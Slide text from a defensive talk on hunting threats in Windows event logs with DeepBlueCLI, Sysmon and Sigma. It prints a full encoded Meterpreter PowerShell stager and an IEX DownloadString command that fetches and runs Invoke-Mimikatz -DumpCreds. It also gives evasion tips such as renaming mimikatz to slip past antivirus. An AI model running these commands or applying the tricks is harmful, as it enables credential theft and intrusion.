Threat Hunting via Windows Event Logs

C511

Threat Hunting via

Windows Event Logs

Eric Conrad (GSE #13)

@eric_conrad
Welcome!

• A copy of this talk is available

at http://ericconrad.com
• Includes a link to the
DeepBlueCLI GitHub site
o https://github.com/sans-blue-
team/DeepBlueCLI/
o Plus sample evtx files for all
major events discussed

Introducing DeepBlueCLIv2 2
Sunlight is the Best Disinfectant – Louis Brandeis

• Malware and exploit frameworks have been evolving faster than

common preventive technologies have kept up
o Detective controls allow more aggressive checks
• By default Metasploit creates random service names like this:
o Service Name: GWRhKCtKcmQarQUS
o Service name matches: ^[A-Za-z]{16}$
• Blocking 16 character service names containing only upper and
lower alpha characters could lead to false positives
• This is how you fight, and this is how you win:
o Automatically detect these names, married with rapid incident response
Introducing DeepBlueCLIv2 3
The Evolution of Windows Malware Payloads

Malware and exploit frameworks often copy an exe to the filesystem

• Often in c:\windows\system32\RanDOmNAme.exe
• Metasploit exploit target: Native upload
• Corporate malware defenses are designed to prevent this
Newer Malware and exploitation frameworks are migrating to
'fileless malware', leveraging PowerShell for post exploitation
• They avoid using .ps1 files, and load the code via (very long) command
lines, or use the PowerShell WebClient.DownloadString Method
• Metasploit exploit target Powershell uses a long compressed and base64-
encoded PowerShell function loaded via cmd.exe

Introducing DeepBlueCLIv2 4
Metasploit Meterpreter Payload via Command Line
C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq
4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object
System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object
IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADQdtlcCA7VWa2/aSBT93Er9D1aFZFslGAhtmkiVdszLhEcA82ZRNdhjM
2TsIfY4PLr973sNdkK3zSpdaS2Q53HvzJlzz51rJ/ItQbkv7a3lQPr27u2bLg6wJykZ52s1K2UeREl98waGM65/27wla3PApC+SMkebTYV7m
PqLm5tyFATEF6d+rk4ECkPiLRkloaJKf0njFQnIxd1yTSwhfZMyX3N1xpeYJWb7MrZWRLpAvh3PtbiFY0g5c8OoUOQ//5TV+UVhkas+RJiFi
mzuQ0G8nM2YrErf1XjDwX5DFLlNrYCH3BG5MfUvi7mhH2KHdGC1R9ImYsXtUFbhLPALiIgCXzo7VbzMyUiRodkNuIVsOyAh+OQa/iO/J0rGj
xjLSn8o8wRDP/IF9QjMCxLwjUmCR2qRMGdg32akT5yF0iHb9OivdVLOncCqKwI1CyF5EWyb2xEjJ39Z/RluHEwVniSgwMH3d2/fvXXS4K8Hp
D3c4fP4Q+vN/NgmgFLp8pAeTb9I+azUhp2w4MEeuplBEBF1Ic3jGMwXCykTcee6M9GzLy9RSO3Bmn7UYWQ+4tRegEcSn4zX/WrcGUPK67NCP
P+y3irEoT6p7H3sUSuVlPIr3onDyPHAudSsA9gUOZkgdoUw4mIRc5iV5j+7VT0qnnz1iDKbBMiC2IWACsKq/gjmFBZFbvht4gFbp74MUXBAy
CS1TsS7T3eP+2AklxkOw6zUjSCTrKxkEsyInZWQH9JkCkWCH5vyM9x2xAS1cCjS5RbqP/lM9i1zPxRBZEEggYOBuSEWxSymJCsZ1Cb63qRuu
r/8S0LKmDHqu7DSIwQERmIiTBHLIwCoqRTUnElEw9sw4oHZMbtrDLuQy0kuHCWFXWLLL4FN1X6SdkxPyssZVIi5ybjISiMaCLgsYqpBX/8Zy
NlF8QOkckCSOClpLs31vYjln9mutlbHEK1YtAlhR3oCAdTUAu7pOCSfSqYIgDjlvXZHywieacNnbUu/pwW0pYVGG/5DetnglSu7ebs2tKCyW
zmoETbaRrfSM4zS4605Kgmz2hDNbkO0q5P12kRGfzgVswYyBjR/Py0dNrf0YLaQPd1pnw76YZvXd4e1azvTiuO4V47ZL3ys0da43NPzRdyqV
KPWWN/q+VJYpVujR4e9+9uaWE5HDA8dzZ0UrjHdtYL1qMDbhwZC9dWldbh1RvVV295PDe16XLpHVYTKfnVU03lzqgeoq42wO+Lb5rrOxm4Z6
TWLkllvWNN7vZqOhvX1Q+Vac8F3glf6eFSks82kv4J+DSA0tXypYZMDn/aApDpH2O2DjVsuWisHbCofkP6hw8Mivtc50sGmNnsAXNNNrctgf
jAscjRinQlGrdm+pmmFabeEjDwd110UL4ldvYdR+Fg5VLTCyOb2+GNn6mijCbvSKuXBxnI0TdsalaY1K+w+312V9PxD2aMeWxZt7Xr4Wfe3T
bf76Nq98VV/19kvYb+hpo3ex/oBAWWW1+tJy/3kn+nhpQLQxkG4wgx0And6mr41HtSSe7rLaeyhKMdifU8CnzAoc1AIU8EjxrgV14r0RodSd
SogC8jfITQvi79sqdKTofpcQNKhm5sZAIU0SsWdaxHfFatsfneZz0NByO9KeTjw6w9Y5pu98rRcNi4qT0yd78OO+6hxhmUObPbZ6+/+XyKT1
F7By34Fkc9j/zL7KnLz2WcCfpr6ceC3mP5tBsaYCrA04Xpi5FRBXyQiEc/ZJ0cSJFCGkzzxF+BdJC468DHyN6LCQgBvCgAA''));IEX
(New-Object IO.StreamReader(New-Object
IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecut
e=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnost
ics.Process]::Start($s);

Introducing DeepBlueCLIv2 5
Details

• Command is > 2400 bytes

• powershell.exe launched via cmd.exe
• Hidden PowerShell window
• gzip compressed and Base64 encoded PowerShell
function
o To analyze: decode base64, and then decompress with gzip
o Result: obfuscated PowerShell function

Introducing DeepBlueCLIv2 6
Obfuscated PowerShell Function (after base64 -d and gzip -d)

Introducing DeepBlueCLIv2 7
Advantages to these Methods

• Antivirus will allow cmd.exe and powershell.exe to execute

• There are no files saved to the disk to scan
• If the system is using application whitelisting: cmd.exe and
powershell.exe will be whitelisted
• Restricting execution of ps1 files via Set-ExecutionPolicy settings has
no effect
o "Set-ExecutionPolicy is not a Security Control" - @Ben0xA, DerbyCon 2016
• There is no logging of process command lines or PowerShell commands by
default
• Preventive and detective controls tend to allow and ignore these methods

Introducing DeepBlueCLIv2 8
Perfect is the Enemy of Good - Voltaire

• Many of the techniques used by DeepBlueCLI can be evaded

o DeepBlueCLI identifies commands containing 'mimikatz'
o Dodge by renaming 'mimikatz' to 'mimidogz'

• Dodging all of the techniques is difficult

o Long command lines
o Use of Net.WebClient
o base64-encoded functions
o Compressed functions
o Obfuscated commands draw attention
• Many IT professionals commit the
perfect solution fallacy
Introducing DeepBlueCLIv2 9
Log Full Command Line of all Processes

• Windows 7+ now supports logging full command line of all

launched processes natively
• Turn this on!
• Run gpedit.msc and set:
o Computer Configuration\Windows Settings\Security Settings\Advanced
Audit Policy Configuration\System Audit Policies\Detailed Tracking
o Computer Configuration\Administrative Templates\System\Audit
Process Creation
• Then monitor:
o PS> Get-WinEvent -FilterHashtable @{Logname="Security"; ID=4688}

Introducing DeepBlueCLIv2 10
Command Lines to Look For

Once logging full command lines: search for the following:

• Loooooooooong commands (1,000+ bytes)
• csc.exe (C# compiler)
• cvtres.exe (Resource File To COFF Object Conversion Utility)
• rundll32.exe and cscript.exe
• .vbs scripts
• schtasks and at
• Anything launched from a temp folder
• Launching PowerShell via cmd.exe
• Base64 encoded commands
Introducing DeepBlueCLIv2 11
PowerShell Logging

• PowerShell 2 (Windows 7) has very

little logging capability
• PowerShell 5+ includes multiple
methods for logging PowerShell
activity (not enabled by default)
• Event 4103 (Module Logging) is very helpful
• PowerShell 2 can be upgraded to PowerShell 5.1 (released with
the Windows 10 Anniversary Update) in one step
• Upgrade all Windows systems to PowerShell 5+

Introducing DeepBlueCLIv2 12
Microsoft Sysinternals Sysmon

Sysinternals Sysmon is a great free tool that monitors

application use (and more)
System Monitor (Sysmon) is a Windows system service and device driver
that, once installed on a system, remains resident across system reboots to
monitor and log system activity to the Windows event log. It provides
detailed information about process creations, network connections, and
changes to file creation time. By collecting the events it generates using
Windows Event Collection or SIEM agents and subsequently analyzing
them, you can identify malicious or anomalous activity and understand
how intruders and malware operate on your network.1

Introducing DeepBlueCLIv2 13
Sysmon: Application Monitoring

Freely available from Microsoft

• Could ease introduction into some environments
Integrates cleanly into most SIEM or Windows Event
Collection environments by logging to Windows Event Log:
Applications and Services Logs/
Microsoft/Windows/Sysmon/Operational
Sysmon can automatically generate hashes of all (or
selected) binaries that run on a system
• Allows submission to services such as VirusTotal
• Or a belt-and-suspenders detective whitelisting process…
Introducing DeepBlueCLIv2 14
Sysmon Capabilities

Microsoft aggressively updates Sysmon, so look for new

versions/features added regularly
Key capabilities include logging Event ID in parentheses:
Process Registry
• Process creation (1), Driver loads (6), Key/value creation or deletion (12), and
Image/DLL loads (7), modification (13)
CreateRemoteThread (8), Named File
Pipes (17/18) Create time modification (2), File create
(11), ADS create (15)
Network
WMI
Connection (3) hostname, IP, port, Event filter activity (19), consumer
PID activity (20), consumer filter activity (21)
Introducing DeepBlueCLIv2 15
IMPHASH: Hash++

Sysmon can log a variety of hashes

<HashAlgorithms>*</HashAlgorithms>
• Generate all the hashes Sysmon understands: MD5, SHA1, SHA256, and…
IMPHASH – Wait, what is that one???
IMPHASH (import hash), popularized by Mandiant, was designed
specifically for detect/response capabilities, not just integrity
• Rather than simply taking a cryptographic hash of a file, an IMPHASH
hashes an executable's function or API imports from DLLs
Because of the way a PE's import table is, we can use the imphash
value to identify related malware samples1

Introducing DeepBlueCLIv2 16
Upcoming Sysmon Update

Introducing DeepBlueCLIv2 17
Mandiant M-Trends on Mimikatz

Mandiant reports heavy attacker use of Mimikatz:

In nearly all of our investigations, the victims’ anti-virus software failed
to hinder Mimikatz, despite the tool’s wide reach and reputation.
Attackers typically modified and recompiled the source code to evade
detection.1
Tools like Metasploit include some Mimikatz functionality, and
there are also PowerShell versions
• But the current native Mimikatz binary is typically more powerful and up to
date
How difficult is compiling a custom/altered version of Mimikatz?

Introducing DeepBlueCLIv2 18
The Sed Persistent Threat (SPT)

Windows mimikatz binary download

• 70% AV detection rate
Compiled mimikatz binary from source
(no changes)
• 31% AV detection rate
Compiled mimidogz binary from
source
• s/mimikatz/mimidogz/g
• 7% AV detection rate

Introducing DeepBlueCLIv2 19
This Dog Can Hunt!

Introducing DeepBlueCLIv2 20
Whack-a-Mole

• We rescanned mimidogz a few hours later on VirusTotal, and

Kaspersky suddenly detected it
• We rescanned the next morning, and 6 more vendors detected it
(13 total)
• The total reached 26 vendors a week later

Introducing DeepBlueCLIv2 21
Announcing Mimiyakz:The Sed Persistent Threat (SPT) Strikes Again!

Introducing DeepBlueCLIv2 22
 IMPHASH to the Rescue

Mimidogz SHA1=7E3CE3B80B77D423103AF2DC64488DA843D2CC16
Mimidogz IMPHASH=C7E2E477687C6F5E733C140990FCCFFC

Mimiyakz SHA1=B7A150ADDC518533E3894D2EDEF117EEB79B207E
Mimiyakz IMPHASH=C7E2E477687C6F5E733C140990FCCFFC
Introducing DeepBlueCLIv2 23
Detecting Unusual and Unsigned Drivers and Images with Sysmon

• Note the two Sysmon

event logs on the right
• One is signed (by
Microsoft)
• One isn't!

Introducing DeepBlueCLIv2 24
DeepBlueCLIv2

• DeepBlueCLI (PowerShell version) runs on PowerShell 3.0 or higher

o Can process PowerShell 4.0/5.0 event logs
o DeepWhite requires PowerShell 4+
• Processes local event logs, or evtx files
o Either feed it evtx files, or parse the live logs via Windows Event Log collection
• DeepBlueCLIv2 outputs in PowerShell objects
o May be piped to Format-List, Format-Table, Out-GridView, ConvertTo-Csv,
ConvertTo-HTML, ConvertTo-json, ConvertTo-Xml, etc.
• Thanks for the help: Joshua Wright (@joswr1ght), John Strand
(@strandjs), and Mick Douglas (@bettersafetynet).

Introducing DeepBlueCLIv2 25
Thanks, John!

Introducing DeepBlueCLIv2 26
Recent Updates to DeepBlueCLI

Introducing DeepBlueCLIv2 27
Call for EVTX files

• We are actively updating DeepBlueCLI, and are

looking for EVTX files that contain evidence of
malice
• If you have EVTX files you are willing to share,
email me at [email protected]
• We will work to add new features to DeepBlueCLI
based on submitted EVTX files

Introducing DeepBlueCLIv2 28
DeepBlueCLI

DeepBlueCLI
detects a large
number of
suspicious
behaviors

Introducing DeepBlueCLIv2 29
DeepBlueCLI Example: Password Spray

Introducing DeepBlueCLIv2 30
DeepBlueCLI

DeepBlueCLI
contains a
number of
example EVTX
files containing
malice

Introducing DeepBlueCLIv2 31
DeepBlueCLI Output Options

asfa

Introducing DeepBlueCLIv2 32
DeepBlue CLI: Base64 and/or Compressed Commands

• DeepBlueCLI attempts to automatically detect base64-

encoded commands
o And automatically decode them
• If the commands are also compressed (Metasploit-style)
it will also uncompress them
• In both cases: it will then scan the normalized command
for malicious regular expression matches

Introducing DeepBlueCLIv2 33
PowerShell Command Parsing vs. Script parsing

• Parsing CMD and PowerShell command lines is *much* easier

than parsing the scripts themselves
• DeepBlueCLI parses command lines (and other event log data),
not script content
• Check out Revoke-Obfuscation from Daniel Bohannon
(@danielhbohannon) and Lee Holmes' (@Lee_Holmes)
awesome solution to obfuscation in scripts
o https://github.com/danielbohannon/Revoke-Obfuscation

Introducing DeepBlueCLIv2 34
Parsing PowerShell Event 4104

• PowerShell event 4014 (Script Block Logging) contains a ton of

data
• DeepBlueCLI focuses on the PowerShell command line that
launched the script block, and parses it for pattern matches and
signs of obfuscation
o Thanks: @heinzarelli, @HackerHurricane, and @danielhbohannon

Introducing DeepBlueCLIv2 35
Case Study: Petya

In cases where the SMB exploit fails, Petya tries to spread using
PsExec under local user accounts. (PsExec is a command-line tool
that allows users to run processes on remote systems.) It also runs
a modified mimikatz LSAdump tool that finds all available user
credentials in memory.
It attempts to run the Windows Management Instrumentation
Command-line (WMIC) to deploy and execute the payload on each
known host with relevant credentials. (WMIC is a scripting
interface that simplifies the use of Windows Management
Instrumentation (WMI) and systems managed through it.)1
-Sophos
Introducing DeepBlueCLIv2 36
Case Study: NotPetya

• NotPetya is part of a family of malware based on the leaked (alleged) NSA

hacking tools, including ETERNALBLUE
o This exploit targeted Windows Server Message Block (SMB, TCP port 445) and was
patched by MS17-0101
• This malware would typically enter an environment via SMB
o It would then use Mimikatz to attempt to steal credentials and move laterally through a
network via Microsoft PSExec and WMIC (Windows Management Instrumentation
Console
o Automated malware is now behaving like human penetration testers
• If an organization had one unpatched system and 999 patched: all 1,000
could become compromised
o This is dependent on internet network segmentation, trust models, etc.

Introducing DeepBlueCLIv2 37
NotPetya Financial Cost

The release of NotPetya was an act of cyberwar by almost any

definition—one that was likely more explosive than even its creators
intended. Within hours of its first appearance, the worm raced beyond
Ukraine and out to countless machines around the world, from
hospitals in Pennsylvania to a chocolate factory in Tasmania. It
crippled multinational companies including Maersk, pharmaceutical
giant Merck, FedEx’s European subsidiary TNT Express, French
construction company Saint-Gobain, food producer Mondelēz, and
manufacturer Reckitt Benckiser. In each case, it inflicted nine-figure
costs. It even spread back to Russia, striking the state oil company
Rosneft.
The result was more than $10 billion in total damages…1
Introducing DeepBlueCLIv2 38
NotPetya Effects on Ukraine

On a national scale, NotPetya was eating Ukraine’s computers alive. It

would hit at least four hospitals in Kiev alone, six power companies, two
airports, more than 22 Ukrainian banks, ATMs and card payment
systems in retailers and transport, and practically every federal
agency. “The government was dead,” summarizes Ukrainian minister of
infrastructure Volodymyr Omelyan. According to ISSP, at least 300
companies were hit, and one senior Ukrainian government official
estimated that 10 percent of all computers in the country were wiped.
The attack even shut down the computers used by scientists at the
Chernobyl cleanup site, 60 miles north of Kiev. “It was a massive
bombing of all our systems,” Omelyan says.1

Introducing DeepBlueCLIv2 39
NotPetya Effects on Maersk

Maersk is "world’s largest container shipping company,"1 based in

Copenhagen, Denmark
• At around 9 am New Jersey time, Fernández’s phone started buzzing with
a succession of screaming calls from angry cargo owners. All of them had
just heard from truck drivers that their vehicles were stuck outside
Maersk’s Elizabeth terminal. “People were jumping up and down,”
Fernández says. “They couldn’t get their containers in and out of the gate.”
• Soon, hundreds of 18-wheelers were backed up in a line that stretched for
miles outside the terminal. One employee at another company’s nearby
terminal at the same New Jersey port watched the trucks collect, bumper
to bumper, farther than he could see.… Police began to approach drivers in
their cabs, telling them to turn their massive loads around and clear out.1
Introducing DeepBlueCLIv2 40
Maersk Information Security Improvements

Maersk security staffers tell WIRED that some of the corporation’s servers were,
up until the attack, still running Windows 2000—an operating system so old
Microsoft no longer supported it.… They called attention to Maersk’s less-than-
perfect software patching, outdated operating systems, and above all insufficient
network segmentation. That last vulnerability in particular, they warned, could
allow malware with access to one part of the network to spread wildly beyond its
initial foothold, exactly as NotPetya would the next year.
Since then… Maersk has worked not only to improve its cybersecurity but also to
make it a “competitive advantage.” Indeed, in the wake of NotPetya, IT staffers
say that practically every security feature they’ve asked for has been almost
immediately approved. Multifactor authentication has been rolled out across the
company, along with a long-delayed upgrade to Windows 10.1

Introducing DeepBlueCLIv2 41
Case Study: SAMSAM attack on the City of Atlanta I

For over a week, the City of Atlanta has battled a ransomware

attack that has caused serious digital disruptions in five of the
city's 13 local government departments. The attack has had far-
reaching impacts—crippling the court system, keeping residents
from paying their water bills, limiting vital communications like
sewer infrastructure requests, and pushing the Atlanta Police
Department to file paper reports for days. It's been a devastating
barrage—all caused by a standard, but notoriously effective strain
of ransomware called SamSam.
- https://www.wired.com/story/atlanta-ransomware-samsam-will-
strike-again/
Introducing DeepBlueCLIv2 42
Case Study: SAMSAM attack on the City of Atlanta II

Unlike many ransomware variants that spread through phishing

or online scams and require an individual to inadvertently run a
malicious program on a PC (which can then start a chain reaction
across a network), SamSam infiltrates by exploiting
vulnerabilities or guessing weak passwords in a target's public-
facing systems, and then uses mechanisms like the popular
Mimikatz password discovery tool to start to gain control of a
network
- https://www.wired.com/story/atlanta-ransomware-samsam-will-
strike-again/

Introducing DeepBlueCLIv2 43
.
SAMSAM spreading via WMI and PsExec

After the threat actors establish a foothold within a network segment, they
can enumerate hosts and users on the network via native Windows
commands such as NET.EXE. The attackers utilize malicious PowerShell
scripts to load the Mimikatz credential harvesting utility, allowing them to
obtain access to privileged accounts. By moving laterally and dumping
additional credentials, attackers can eventually obtain Active Directory
domain administrator or highly privileged service accounts.
Given these credentials, attackers can infect domain controllers, destroy
backups, and proceed to automatically target and encrypt a broader set of
endpoints. The threat actors deploy and run the malware using a batch script
and WMI or PsExec utilities.
- https://tanium.com/blog/samsam-ransomware-how-tanium-can-help/

Introducing DeepBlueCLIv2 44
Three Slides on Defensible Security Architecture

• This talk is on detection, not security architecture, so I will keep this brief
• Everyone seeing this talk should ensure their organization:
o Has patched every Windows system for MS17-010
• And deployed compensating controls (such as firewalls) for those that can't be (easily) patched
o Uses a different local administrator password on every Windows system (LAPS)
o Does not expose critical services (including Email, VPN, Remote Desktop Protocol, and
others) to the Internet via single-factor authentication
• Begin limiting privilege for powerful accounts and groups, including
Domain Administrators (and many others)
• For organizations with flat internal networks: begin the process of
segmenting them
o Private VLANs (discussed next) are often a quick win
Introducing DeepBlueCLIv2 45
Defensible Secure Architecture: Private VLANs (PVLANs)

• Private VLANs are (usually) one of the easiest 'wins' an organization may achieve for
making pivoting more difficult to an attacker
o 'Pivoting' describes the act 'moving behind enemy lines,' when malware (or a person) moves from
one compromised internal host to another host
o Lots of malware will attempt to pivot from one client PC to another
• Many corporate wireless solutions offer 'station isolation': a client on a wireless access point
may speak to the AP (which is also a switch and a router) only
o Clients may not access other clients on the same AP
o Clients may also be prohibited from speaking to any other clients (on other APs)
• A private VLAN is the wired equivalent to wireless station isolation
o If this makes sense for wireless clients: why not wired?
• If Private VLANs are not appropriate for your environment, use the host-based
firewall to achieve the same goal (blocking client<->client traffic)

Introducing DeepBlueCLIv2 46
Host-Based Firewall Capabilities

• Most host-based firewalls can

block based on ports, IP
addresses, and applications
• Do you allow the following
applications to send traffic from
your non-IT Windows clients?
o powershell.exe
o psexec.exe
o wmic.exe
• If so: why?
Introducing DeepBlueCLIv2 47
Test PowerShell Command

• The test command is the PowerSploit Invoke-Mimikatz

command, typically loaded via NetWebClient
DownloadString
o IEX (New-Object
Net.WebClient).DownloadString('https://raw.git
hubusercontent.com/mattifestation/PowerSploit/
master/Exfiltration/Invoke-Mimikatz.ps1');
Invoke-Mimikatz –DumpCreds

Introducing DeepBlueCLIv2 48
PowerShell via PsExec: Event Log View

• Event is logged via security Event 4688 (and Sysmon event 1)

• Telltale sign (beyond the Command Line):
o Creator Process Name: C:\Windows\PSEXESVC.exe

Introducing DeepBlueCLIv2 49
WMIC details

• Malware is increasingly using WMIC to move laterally by stealing

credentials and executing remote commands via "process call create"
o This vector is often used to execute PowerShell
o Pro tip: encoding as base64 avoids issues with quotes and double quotes
• For testers: WMIC will not show command STDOUT locally (it is displayed
on the remote system)
o Dodge this: save output to a remote share under attacker control
• Thanks: Ed Skoudis, Command Line Kung Fu episode 313
o The local WMIC process has limited share access, regardless of running user
o The share should allow anonymous access1
o Fun fact: anonymous is not in the 'everyone' group

Introducing DeepBlueCLIv2 50
PowerShell via WMIC: Event Log View

• Event is logged via security Event 4688 (and Sysmon event 1)

• Telltale sign (beyond the Command Line):
o Creator Process Name: C:\Windows\System32\wbem\WmiPrvSE.exe

Introducing DeepBlueCLIv2 51
Use Case: DeepBlueCLI vs. PowerShell via WMIC and PsExec

Introducing DeepBlueCLIv2 52
DeepWhite

• DeepWhite performs detective executable whitelisting

o Parses the following Sysmon events: process creation (1), Driver loads (6), and
Image/DLL loads (7)
o Can also submit a list of hashes from a CSV file
o Checks the SHA256 hash vs. a whitelist
• Whitelist creation: Get-ChildItem c:\windows\system32 -Include
'*.exe','*.dll','*.sys','*.com' -Recurse|Get-FileHash|Export-Csv -Path whitelist.csv

• It auto-submits non-whitelisted hashes to VirusTotal using @darkoperator's

Posh-Virustotal5
o Requires free Virustotal personal API key6 (which is limited to 4 queries/minute)
o https://www.virustotal.com/en/documentation/public-api/
• DeepWhite submits hashes every 15 seconds
Introducing DeepBlueCLIv2 53
mimikatz.exe: Sysmon event 1,Virustotal report

FB55414848281F804858CE188C3DC659D129E283BD62D58D34F6E6F568FEAB37
Introducing DeepBlueCLIv2 54
DeepWhite Details

• Here's mimikatz.exe:

• Note: it is quite common to receive 1 Virustotal hit for

benign software

Introducing DeepBlueCLIv2 55
Virustotal False Positives I

• Reasons for Virustotal false positives:

• Legitimate Microsoft software that is abused by attackers, such as
PsExec downloaded directly from Microsoft Sysinternals:

Introducing DeepBlueCLIv2 56
Virustotal False Positives II

• Legitimate software is also sometimes flagged

o Often because it's unsigned (yes, Microsoft still does this occasionally)
o …and scanned by an aggressive heuristic model
o ...often by a new/small company

Introducing DeepBlueCLIv2 57
Enter Sigma

We have a lot of data, and a lot of tools to analyze the data

• Different data formats, different dashboard formats, etc.
1. Even in deployments of same SIEM…
• Field names differ
• Data sources differ
2. We collect in different log formats:
• Windows logs – Syslog, JSON, XML
3. We have no common language to specify analytics

Introducing DeepBlueCLIv2 58
Sigma to the Rescue!

• Written by Florian Roth & Thomas Patzke

• "To logs, what Snort is to network traffic and YARA is to files"
• High level generic language for analytics
• Best method so far of solving logging signature problem!
• Enables analytics re-use and sharing across orgs
• MISP compatible - share and store aligned with threat intel
• Decouples rule logic from SIEM vendor and field names
• Eliminates SIEM tribal knowledge
• Blue teams needs this!!!

Introducing DeepBlueCLIv2 59
How Sigma Works

Introducing DeepBlueCLIv2 60
 Conversion of Signatures to Alert Queries
Company 1 Search Query Alert
field names Engine
Splunk
Company 2 Search Query
Alert
field names Engine
Qradar

Sigma Rule Elasticsearch Company 3 Search Query Alert

Analytics field names Engine

… …

Grep Grep
command

Written by Mapping to your field names,

community written by you
Introducing DeepBlueCLIv2 61
Rule Format

• Plain text YAML files

• Easy schema
1. Metadata
• Title, status, description, references, tags, etc.
2. Log Source
• What type, brand, and service is the log from?
3. Detection – List of Selectors
4. Condition – Logic for selector matching
Introducing DeepBlueCLIv2 62
 Title, Metadata, and Log Source

Log source:
Windows Sysmon
Sysmon EventID 8 (create
remote thread)

Introducing DeepBlueCLIv2 63
Log Source Section

Optional Classifiers:
• category: proxy, firewall, AV, IDS
• For all logs of a group of products
• product: Squid, pfSense, Symantec, Snort, Windows
• For all log outputs of one product
• service: SSH, DNS, DHCP
• For a subset of a products logs – sshd, named, …
• description: Additional detail on log source, configs
Introducing DeepBlueCLIv2 64
Supported Outputs

• Splunk
• QRadar
• ArcSight
• Elasticsearch (Elastalert, Query strings, DSL, Watcher, & Kibana)
• Logpoint
• Qualys
• Windows Defender ATP
• PowerShell
• grep
Introducing DeepBlueCLIv2 65
Example: PowerShell syntax

• Generate PowerShell syntax for the PowerShell remote

thread creation in Rundll32.exe event:
$ sigmac -t powershell sysmon_susp_powershell_rundll32.yml

• PowerShell Get-WinEvent syntax to locate that event:

PS:/> Get-WinEvent | where {($_.ID -eq "8" -and $_.message
-match "SourceImage.*.*\\powershell.exe" -and $_.message -
match "TargetImage.*.*\\rundll32.exe") } | select
TimeCreated,Id,RecordId,ProcessId,MachineName,Message

Introducing DeepBlueCLIv2 66
Example: Splunk syntax

• Generate Splunk syntax for the PowerShell remote

thread creation in Rundll32.exe event:
$ sigmac -t splunk sysmon_susp_powershell_rundll32.yml

• Splunk syntax to locate that event:

(EventID="8" SourceImage="*\\powershell.exe"
TargetImage="*\\rundll32.exe")

Introducing DeepBlueCLIv2 67
Example: Kibana syntax

Introducing DeepBlueCLIv2 68
Demo Time!

Introducing DeepBlueCLIv2 69
Thank you!

• Contact me on Twitter:
o @eric_conrad
• DeepBlueCLI is available at:
https://github.com/sans-blue-
team/DeepBlueCLI/
• A copy of this talk is available at
http://ericconrad.com
• Check out Security 511 for more blue
team goodness: http://sec511.com
• Security 530 (Defensible Security
Architecture) describes controls for
preventing these types of attacks
Introducing DeepBlueCLIv2 70
References
1. Deconstructing Petya: how it spreads and how to fight back,
https://nakedsecurity.sophos.com/2017/06/28/deconstructing-petya-how-it-spreads-and-how-to-fight-back/
2. Mandiant M-Trends 2015, https://www2.fireeye.com/rs/fireye/images/rpt-m-trends-2015.pdf
3. Command Line Kung Fu Episode #31: Remote Command Execution,
http://blog.commandlinekungfu.com/2009/05/episode-31-remote-command-execution.html
4. https://github.com/jaredhaight/PSAttack
5. https://github.com/darkoperator/Posh-VirusTotal
6. https://www.virustotal.com/en/documentation/public-api/
7. http://blog.securityonion.net/2017/09/elastic-stack-alpha-release-and.html
8. https://github.com/philhagen/sof-elk
9. https://nxlog.co/products/nxlog-enterprise-edition
10. https://github.com/williballenthin/python-evtx
11. https://github.com/libyal/libevtx

Introducing DeepBlueCLIv2 71